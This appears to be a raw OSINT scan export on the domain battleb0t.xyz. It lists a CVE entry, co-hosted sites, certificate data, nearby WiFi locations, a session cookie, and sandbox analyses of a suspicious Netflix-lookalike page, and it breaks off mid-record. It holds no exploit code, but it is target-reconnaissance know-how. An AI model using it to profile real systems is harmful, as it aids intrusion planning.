https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | 188.114.96.1 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.188): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 003marek.github.io | 185.199.111.153 |
| 2023-05-12 02:53:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 43CE:4ADD:8C38CD:9E6CB7:645D800F
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250056-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683849232.554003,VS0,VE234
Vary: Accept-Encoding
X-Fastly-Request-ID: c52142f897e3b3bde7efbc782ee478e7cae3ad86
| 2606:50c0:8003::153 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00-duino.github.io | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css | http://nuke.battleb0t.xyz/ |
| 2023-05-12 03:24:52 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United Kingdom | London, England, ENG, United Kingdom, GB |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ru_123rf (Category: hobby)
https://ru.123rf.com/profile_login | login |
| 2023-05-12 02:48:54 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9d:ff:c4:18:06:c7:30:d4:36:0f:0e:18:02:e1:f1:df:09:d5:
21:48:af:f9:5b:c3:31:1b:5f:2b:b6:70:3d:80:2b:58:d6:6f:
b5:cd:ce:70:10:56:ed:d2:2c:18:4d:d8:55:56:01:67:34:4f:
bc:a8:06:13:c7:63:73:41:9d:bd:7a:2d:d7:ed:6a:95:df:86:
a0:fd:bf:15:00:37:ee:c9:32:cd:29:05:23:5a:30:c7:ce:39:
29:07:6d:b0:2b:6a:1c:81:8f:29:05:30:c4:40:2c:ba:5f:67:
f5:56:a5:86:93:08:a2:16:e7:a9:15:01:13:84:23:08:70:b8:
b0:8e:c4:e6:9c:43:cf:99:85:ea:2e:4c:6c:a4:51:b4:75:a3:
cf:1f:af:40:ab:43:86:65:fb:ba:43:42:24:c7:fd:a0:13:49:
bf:fb:a3:fe:ef:4b:38:f1:34:bd:37:28:78:ae:eb:fe:f8:2c:
4d:b8:bd:50:64:c1:2a:97:b9:ac:34:8d:83:6a:c1:4b:6d:6a:
3a:8c:69:86:1e:d9:d4:69:98:23:cc:ff:1b:aa:4f:58:58:dd:
f4:2d:3e:92:9e:ec:9c:7f:4a:ba:35:54:c6:db:d8:38:08:1a:
75:fe:73:ca:92:d8:db:5e:94:c8:9a:15:84:e4:03:5b:a9:4b:
3c:ac:3c:70
| battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | celikpalas (Net ID: 00:12:17:69:2A:A4) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Noisette (Net ID: 00:0D:93:87:BE:5F) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Mezzanine Airport (Net ID: 00:02:2D:0E:42:E3) | 37.7642, -122.3993 |
| 2023-05-12 02:48:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://dpcsit2024.github.io/Netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://dpcsit2024.github.io/Netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f10_IE_EarlyTabStart_0xba0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_f10_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3856"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_f10_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f10_ConnHashTable<3856>_HashTable_Mutex"\n "IsoScope_f10_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f10_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "104.18.23.52:443"\n "142.250.191.74:443"\n "162.55.233.23:443"\n "45.57.90.1:443"\n "203.192.208.115:443"\n "142.250.189.227:443"\n "172.67.75.130:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "dpcsit2024.github.io"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"Watch anywhere, anytime, on an unlimited number of devices. Sign in with your Netflix account to watch instantly on the web at netflix.com from your personal computer or on any internet-connected device that offers the Netflix app, including smart TVs," (Indicator: "netflix.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003856]\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /uploads/netflix/small/netflix_PNG15.png"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://dpcsit2024.github.io/Netflix"\n Pattern match: "https://dpcsit2024.github.io"\n Pattern match: "SUIDMmicrosoft.com/9216409460646431027691299872931531027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license"\n Pattern match: "https://pro.fontawesome.com/releases/v5.10.0/css/all.css"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"\n Pattern match: "http://pngimg.com/uploads/netflix/small/netflix_PNG15.png"\n Pattern match: "https://www.freepnglogos.com/uploads/netflix-logo-0.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/vlv3/9c5457b8-9ab0-4a04-9fc1-e608d5670f1a/710d74e0-7158-408e-8d9b-23c219dee5df/IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small.jpg"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/tv.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-tv-in-0819.m4v"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/mobile-0819.jpg"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/boxshot.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/download-icon.gif"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/device-pile-in.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-devices-in.m4v"\n Pattern match: "https://occ-0-4023-2164.1.nflxso.net/dnm/api/v6/19OhWN2dO19C9txTON9tvTFtefw/AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP.png?r=5cf"\n Pattern match: "SUIDMmicrosoft.com/9216409460646431027691299872931531027574*MUID1CB3868C84876AFA3427947A85CB6B98microsoft.com/1025422709568031106045299880744031027574*_EDGE_V1microsoft.com/9216422709568031106045299888556531027574*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiAyp8kv8JHgFVrJJLmE3tG.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmv1plEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm21llEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrJJLedA.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmg1hlEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmr19lEw.woff"\n Pattern match: "https://fonts | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BabyPips (Category: social)
https://forums.babypips.com/u/login/summary | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FIS (Net ID: 00:02:2D:2E:39:1C) | 34.0544, -118.244 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:09:05) | 50.8897, 6.0563 |
| 2023-05-12 02:44:19 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Fastly | www.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515722CD (Net ID: 00:01:E3:57:22:CD) | 52.3759, 4.8975 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00theway.github.io |
| 2023-05-12 02:55:27 | Web Server | No | URLScan.io | 0 | 1 | 1 | 0 | None | Werkzeug/2.2.2 Python/3.10.9 | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:1D:05) | 50.8897, 6.0563 |
| 2023-05-12 03:15:37 | Cookies | No | Cookie Extractor | 0 | 0 | 4 | 0 | None | CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:54:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 22, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.google.com/url?sa=t&rct=j&q&esrc=s&source=web&cd&cad=rja&uact=8&ved=2ahUKEwig6IWT_sf9AhUqFFkFHaLQDFEQFnoECFUQAQ&url=https%3A%2F%2Fendoflife.date%2Fsplunk&usg=AOvVaw3dNC2fVERURzevqzmzvgio', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base b2610000\n "msedge.exe" loaded module "COMBASE.DLL" at base b7470000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 9b8e0000\n "msedge.exe" loaded module "NTDLL.DLL" at base b7c80000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base b6be0000\n "msedge.exe" loaded module "SHELL32.DLL" at base b57a0000\n "msedge.exe" loaded module "USER32.DLL" at base b7a50000\n "msedge.exe" loaded module "KERNEL32.DLL" at base b6e00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base b4ee0000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base b79a0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base b4ee0000\n "msedge.exe" loaded module "KERNEL32" at base b6e00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base b4ee0000\n "msedge.exe" loaded module "%PROGRAMFILES%\\(X86)\\MICROSOFT\\EDGE\\APPLICATION\\103.0.1264.37\\MSEDGE.DLL" at base 83910000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a005601000040c705b5fd7f0000@ntdll.dll"\n "220023005601000018c705b5fd7f0000@ntdll.dll"\n "19001a00c224000040c705b5fd7f0000@ntdll.dll"\n "22002300c224000018c705b5fd7f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:8176:120:WilError_01"\n "Local\\SM0:8000:304:WilStaging_02"\n "SM0:8000:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:8000:120:WilError_01"\n "SM0:8000:120:WilError_01"\n "Local\\SM0:8176:304:WilStaging_02"\n "SM0:8176:304:WilStaging_02"\n "Local\\SM0:8176:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:8176:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8176:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8176:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:8176:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.185.199.199:443"\n "185.199.109.153:443"\n "185.199.108.154:443"\n "35.247.66.204:443"\n "172.64.100.2:443"\n "54.215.114.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"github.githubassets.com"\n "simpleicons.org"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00008000.00000000.75945.B540F000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00008000"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"85e41a97-0a51-45be-9701-9328a8cccce4.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\85e41a97-0a51-45be-9701-9328a8cccce4.tmp]- [targetUID: 00000000-00008176]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00008176]\n "d8456ed4-264e-4bfa-ae77-3dd1fbe61661.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d8456ed4-264e-4bfa-ae77-3dd1fbe61661.tmp]- [targetUID: 00000000-00008176]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008176]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00008176]\n 